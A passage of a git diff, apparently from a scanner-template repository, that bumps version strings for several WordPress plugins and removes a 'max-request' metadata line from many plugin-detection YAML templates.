http/technologies/wordpress/plugins/better-search-replace.yaml | 1 -
http/technologies/wordpress/plugins/better-wp-security.yaml | 1 -
.../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 -
http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 -
http/technologies/wordpress/plugins/breeze.yaml | 1 -
http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 -
.../wordpress/plugins/child-theme-configurator.yaml | 1 -
http/technologies/wordpress/plugins/classic-editor.yaml | 1 -
http/technologies/wordpress/plugins/classic-widgets.yaml | 1 -
.../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 -
http/technologies/wordpress/plugins/cloudflare.yaml | 1 -
http/technologies/wordpress/plugins/cmb2.yaml | 1 -
http/technologies/wordpress/plugins/coblocks.yaml | 1 -
http/technologies/wordpress/plugins/code-snippets.yaml | 1 -
http/technologies/wordpress/plugins/coming-soon.yaml | 1 -
http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 -
.../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
http/technologies/wordpress/plugins/contact-form-7.yaml | 1 -
http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 -
http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 -
http/technologies/wordpress/plugins/cookie-notice.yaml | 1 -
http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 -
.../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 -
http/technologies/wordpress/plugins/custom-css-js.yaml | 1 -
http/technologies/wordpress/plugins/custom-fonts.yaml | 1 -
http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 -
http/technologies/wordpress/plugins/disable-comments.yaml | 1 -
http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 -
http/technologies/wordpress/plugins/duplicate-page.yaml | 1 -
http/technologies/wordpress/plugins/duplicate-post.yaml | 1 -
http/technologies/wordpress/plugins/duplicator.yaml | 1 -
.../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 -
http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 -
http/technologies/wordpress/plugins/easy-google-fonts.yaml | 1 -
http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 -
http/technologies/wordpress/plugins/elementor.yaml | 1 -
http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 -
http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 -
http/technologies/wordpress/plugins/envato-elements.yaml | 1 -
.../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 -
http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 -
.../wordpress/plugins/facebook-for-woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 -
.../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 -
http/technologies/wordpress/plugins/flamingo.yaml | 1 -
http/technologies/wordpress/plugins/fluentform.yaml | 1 -
http/technologies/wordpress/plugins/font-awesome.yaml | 1 -
.../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 -
http/technologies/wordpress/plugins/formidable.yaml | 1 -
http/technologies/wordpress/plugins/forminator.yaml | 1 -
http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 -
http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
.../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 -
.../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 -
.../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
http/technologies/wordpress/plugins/google-site-kit.yaml | 1 -
.../wordpress/plugins/google-sitemap-generator.yaml | 1 -
http/technologies/wordpress/plugins/gtranslate.yaml | 1 -
http/technologies/wordpress/plugins/gutenberg.yaml | 1 -
http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
.../wordpress/plugins/header-and-footer-scripts.yaml | 1 -
.../wordpress/plugins/header-footer-code-manager.yaml | 1 -
.../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
http/technologies/wordpress/plugins/header-footer.yaml | 1 -
http/technologies/wordpress/plugins/health-check.yaml | 1 -
http/technologies/wordpress/plugins/hello-dolly.yaml | 1 -
http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 -
http/technologies/wordpress/plugins/imagify.yaml | 1 -
http/technologies/wordpress/plugins/imsanity.yaml | 1 -
.../wordpress/plugins/insert-headers-and-footers.yaml | 1 -
http/technologies/wordpress/plugins/instagram-feed.yaml | 1 -
.../wordpress/plugins/intuitive-custom-post-order.yaml | 1 -
http/technologies/wordpress/plugins/iwp-client.yaml | 1 -
http/technologies/wordpress/plugins/jetpack.yaml | 1 -
http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 -
http/technologies/wordpress/plugins/kirki.yaml | 1 -
http/technologies/wordpress/plugins/leadin.yaml | 1 -
.../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 -
http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 -
http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 -
http/technologies/wordpress/plugins/loco-translate.yaml | 1 -
http/technologies/wordpress/plugins/loginizer.yaml | 1 -
http/technologies/wordpress/plugins/loginpress.yaml | 1 -
.../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 -
http/technologies/wordpress/plugins/mailpoet.yaml | 1 -
http/technologies/wordpress/plugins/maintenance.yaml | 1 -
http/technologies/wordpress/plugins/mainwp-child.yaml | 1 -
http/technologies/wordpress/plugins/malcare-security.yaml | 1 -
http/technologies/wordpress/plugins/megamenu.yaml | 1 -
http/technologies/wordpress/plugins/members.yaml | 1 -
http/technologies/wordpress/plugins/meta-box.yaml | 1 -
http/technologies/wordpress/plugins/ml-slider.yaml | 1 -
http/technologies/wordpress/plugins/newsletter.yaml | 1 -
.../wordpress/plugins/nextend-facebook-connect.yaml | 1 -
http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 -
http/technologies/wordpress/plugins/ninja-forms.yaml | 1 -
http/technologies/wordpress/plugins/ocean-extra.yaml | 1 -
.../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 -
http/technologies/wordpress/plugins/optinmonster.yaml | 1 -
http/technologies/wordpress/plugins/otter-blocks.yaml | 1 -
http/technologies/wordpress/plugins/password-protected.yaml | 1 -
http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 -
http/technologies/wordpress/plugins/photo-gallery.yaml | 1 -
http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 -
http/technologies/wordpress/plugins/polylang.yaml | 1 -
http/technologies/wordpress/plugins/popup-builder.yaml | 1 -
http/technologies/wordpress/plugins/popup-maker.yaml | 1 -
http/technologies/wordpress/plugins/post-smtp.yaml | 1 -
http/technologies/wordpress/plugins/post-types-order.yaml | 1 -
.../wordpress/plugins/premium-addons-for-elementor.yaml | 1 -
http/technologies/wordpress/plugins/pretty-link.yaml | 1 -
http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 -
http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 -
http/technologies/wordpress/plugins/redirection.yaml | 1 -
http/technologies/wordpress/plugins/redux-framework.yaml | 1 -
http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 -
http/technologies/wordpress/plugins/safe-svg.yaml | 1 -
http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 -
http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 -
http/technologies/wordpress/plugins/sg-security.yaml | 1 -
http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 -
.../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 -
.../wordpress/plugins/simple-custom-post-order.yaml | 1 -
http/technologies/wordpress/plugins/siteguard.yaml | 1 -
http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 -
http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 -
http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 -
.../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 -
http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 -
http/technologies/wordpress/plugins/svg-support.yaml | 1 -
http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
http/technologies/wordpress/plugins/tablepress.yaml | 1 -
http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 -
http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 -
http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 -
http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 -
.../wordpress/plugins/translatepress-multilingual.yaml | 1 -
.../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 -
.../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
http/technologies/wordpress/plugins/updraftplus.yaml | 1 -
http/technologies/wordpress/plugins/use-any-font.yaml | 1 -
http/technologies/wordpress/plugins/user-role-editor.yaml | 1 -
.../wordpress/plugins/velvet-blues-update-urls.yaml | 1 -
http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 -
.../wordpress/plugins/webp-converter-for-media.yaml | 1 -
http/technologies/wordpress/plugins/webp-express.yaml | 1 -
.../wordpress/plugins/widget-importer-exporter.yaml | 1 -
.../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 -
.../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 -
http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
.../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 -
.../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 -
.../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 -
.../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 -
http/technologies/wordpress/plugins/woocommerce.yaml | 1 -
http/technologies/wordpress/plugins/wordfence.yaml | 1 -
http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 -
http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 -
http/technologies/wordpress/plugins/worker.yaml | 1 -
http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 -
http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 -
http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 -
http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 -
http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 -
http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 -
http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 -
http/technologies/wordpress/plugins/wp-optimize.yaml | 1 -
http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 -
http/technologies/wordpress/plugins/wp-reset.yaml | 1 -
http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 -
http/technologies/wordpress/plugins/wp-smushit.yaml | 1 -
http/technologies/wordpress/plugins/wp-statistics.yaml | 1 -
http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 -
http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 -
http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 -
http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 -
http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 -
http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 -
http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 -
.../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 -
211 files changed, 11 insertions(+), 211 deletions(-)
diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
index b7f7949443..da3a40311f 100644
--- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt
+++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
@@ -1 +1 @@
-4.3.9
\ No newline at end of file
+4.4.0.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/autoptimize.txt b/helpers/wordpress/plugins/autoptimize.txt
index d40b13a3fb..301a9a951c 100644
--- a/helpers/wordpress/plugins/autoptimize.txt
+++ b/helpers/wordpress/plugins/autoptimize.txt
@@ -1 +1 @@
-3.1.7
\ No newline at end of file
+3.1.8.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/coblocks.txt b/helpers/wordpress/plugins/coblocks.txt
index 282895a8f8..b38ebbfce2 100644
--- a/helpers/wordpress/plugins/coblocks.txt
+++ b/helpers/wordpress/plugins/coblocks.txt
@@ -1 +1 @@
-3.0.3
\ No newline at end of file
+3.0.4
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/duplicator.txt b/helpers/wordpress/plugins/duplicator.txt
index 63ebd3fe34..5ebba4f08a 100644
--- a/helpers/wordpress/plugins/duplicator.txt
+++ b/helpers/wordpress/plugins/duplicator.txt
@@ -1 +1 @@
-1.5.4
\ No newline at end of file
+1.5.5
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/fluentform.txt b/helpers/wordpress/plugins/fluentform.txt
index 97915771a4..32f3eaad0d 100644
--- a/helpers/wordpress/plugins/fluentform.txt
+++ b/helpers/wordpress/plugins/fluentform.txt
@@ -1 +1 @@
-4.3.25
\ No newline at end of file
+5.0.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt
index 722fb619ce..23900d674d 100644
--- a/helpers/wordpress/plugins/meta-box.txt
+++ b/helpers/wordpress/plugins/meta-box.txt
@@ -1 +1 @@
-5.7.2
\ No newline at end of file
+5.7.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt
index 697362d4d4..103bfb6b11 100644
--- a/helpers/wordpress/plugins/newsletter.txt
+++ b/helpers/wordpress/plugins/newsletter.txt
@@ -1 +1 @@
-7.8.6
\ No newline at end of file
+7.8.7
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/optinmonster.txt b/helpers/wordpress/plugins/optinmonster.txt
index cb9778b417..3a36fc04c0 100644
--- a/helpers/wordpress/plugins/optinmonster.txt
+++ b/helpers/wordpress/plugins/optinmonster.txt
@@ -1 +1 @@
-2.13.4
\ No newline at end of file
+2.13.5
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
index 6206eaf15b..1910ba9d23 100644
--- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt
+++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
@@ -1 +1 @@
-4.9.57
\ No newline at end of file
+4.10.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt
index 132c6def58..4de0b707f6 100644
--- a/helpers/wordpress/plugins/the-events-calendar.txt
+++ b/helpers/wordpress/plugins/the-events-calendar.txt
@@ -1 +1 @@
-6.1.1
\ No newline at end of file
+6.1.2.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
index ba5c9fca65..4484c2b27f 100644
--- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
+++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
@@ -1 +1 @@
-2.6.7
\ No newline at end of file
+2.6.8
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ad-inserter/
metadata:
- max-request: 1
plugin_namespace: ad-inserter
wpscan: https://wpscan.com/plugin/ad-inserter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/add-to-any/
metadata:
- max-request: 1
plugin_namespace: add-to-any
wpscan: https://wpscan.com/plugin/add-to-any
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/admin-menu-editor/
metadata:
- max-request: 1
plugin_namespace: admin-menu-editor
wpscan: https://wpscan.com/plugin/admin-menu-editor
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/advanced-custom-fields/
metadata:
- max-request: 1
plugin_namespace: advanced-custom-fields
wpscan: https://wpscan.com/plugin/advanced-custom-fields
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index 06cfd4950b..97f1d8c18f 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/akismet/
metadata:
- max-request: 1
plugin_namespace: akismet
wpscan: https://wpscan.com/plugin/akismet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-404-redirect-to-homepage/
metadata:
- max-request: 1
plugin_namespace: all-404-redirect-to-homepage
wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-seo-pack/
metadata:
- max-request: 1
plugin_namespace: all-in-one-seo-pack
wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-migration/
metadata:
- max-request: 1
plugin_namespace: all-in-one-wp-migration
wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
metadata:
- max-request: 1
plugin_namespace: all-in-one-wp-security-and-firewall
wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/amp/
metadata:
- max-request: 1
plugin_namespace: amp
wpscan: https://wpscan.com/plugin/amp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/antispam-bee/
metadata:
- max-request: 1
plugin_namespace: antispam-bee
wpscan: https://wpscan.com/plugin/antispam-bee
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/astra-sites/
metadata:
- max-request: 1
plugin_namespace: astra-sites
wpscan: https://wpscan.com/plugin/astra-sites
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/astra-widgets/
metadata:
- max-request: 1
plugin_namespace: astra-widgets
wpscan: https://wpscan.com/plugin/astra-widgets
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/autoptimize/
metadata:
- max-request: 1
plugin_namespace: autoptimize
wpscan: https://wpscan.com/plugin/autoptimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/backwpup/
metadata:
- max-request: 1
plugin_namespace: backwpup
wpscan: https://wpscan.com/plugin/backwpup
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/better-search-replace/
metadata:
- max-request: 1
plugin_namespace: better-search-replace
wpscan: https://wpscan.com/plugin/better-search-replace
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/better-wp-security/
metadata:
- max-request: 1
plugin_namespace: better-wp-security
wpscan: https://wpscan.com/plugin/better-wp-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/black-studio-tinymce-widget/
metadata:
- max-request: 1
plugin_namespace: black-studio-tinymce-widget
wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/breadcrumb-navxt/
metadata:
- max-request: 1
plugin_namespace: breadcrumb-navxt
wpscan: https://wpscan.com/plugin/breadcrumb-navxt
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/breeze/
metadata:
- max-request: 1
plugin_namespace: breeze
wpscan: https://wpscan.com/plugin/breeze
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/broken-link-checker/
metadata:
- max-request: 1
plugin_namespace: broken-link-checker
wpscan: https://wpscan.com/plugin/broken-link-checker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/child-theme-configurator/
metadata:
- max-request: 1
plugin_namespace: child-theme-configurator
wpscan: https://wpscan.com/plugin/child-theme-configurator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/classic-editor/
metadata:
- max-request: 1
plugin_namespace: classic-editor
wpscan: https://wpscan.com/plugin/classic-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/classic-widgets/
metadata:
- max-request: 1
plugin_namespace: classic-widgets
wpscan: https://wpscan.com/plugin/classic-widgets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/click-to-chat-for-whatsapp/
metadata:
- max-request: 1
plugin_namespace: click-to-chat-for-whatsapp
wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml
index 425adf0bfe..e555bf93d3 100644
--- a/http/technologies/wordpress/plugins/cloudflare.yaml
+++ b/http/technologies/wordpress/plugins/cloudflare.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cloudflare/
metadata:
- max-request: 1
plugin_namespace: cloudflare
wpscan: https://wpscan.com/plugin/cloudflare
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
